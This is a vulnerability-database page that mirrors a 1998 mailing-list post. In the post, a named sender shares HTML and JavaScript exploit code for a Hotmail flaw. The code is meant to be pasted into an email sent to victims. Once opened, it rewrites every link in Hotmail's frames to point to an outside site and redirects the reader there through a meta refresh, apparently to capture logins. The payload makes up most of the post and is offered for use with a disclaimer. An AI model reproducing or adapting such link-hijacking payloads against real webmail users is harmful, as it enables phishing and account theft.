Lucene search

hotmail-attack-082698.txt

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType

packetstorm🔗 packetstormsecurity.com👁 23 Views

Code for exploiting Hotmail flaw via email sent to victims, tested on Internet Explorer and Netscape.

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`Date: Wed, 26 Aug 1998 18:21:40 +0200  
From: Jonathan James <[email protected]>  
Subject: SV: Serious Security Hole in Hotmail  

Dear all.  
I've got some e-mail-requests concerning my "second" version of the  
"hotmail flaw", so I've decided to post the code. This has been tested on  
IE 4.0 > and Netscape 3.0 >.  
The code attached should be inserted into the mail that is sent to the  
victim.  
Remember. I may NOT be responsible for any of your actions, when  
implementing the contents of the attached file etc.  
Thankyou.  

Regards  

[uudecoded file below]  

<html>  
<meta http-equiv="refresh" content="1; url=http://www.because-we-can.com/hotmail/default.htm">  
<head></head><body>  
<P>Hotmail flaw. (second version)  
<script>  
errurl="http://http://www.because-we-can.com/hotmail/default.htm";  

nomenulinks=top.submenu.document.links.length;  
for(i=0;i<nomenulinks-1;i++){  
top.submenu.document.links[i].target="work";  
top.submenu.document.links[i].href=errurl;  
}  
noworklinks=top.work.document.links.length;  
for(i=0;i<noworklinks-1;i++){  
top.work.document.links[i].target="work";  
top.work.document.links[i].href=errurl;  
}  
</script>  
</body>  
</html>  

`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

17 Aug 1999 00:00Current

7.4High risk

Vulners AI Score7.4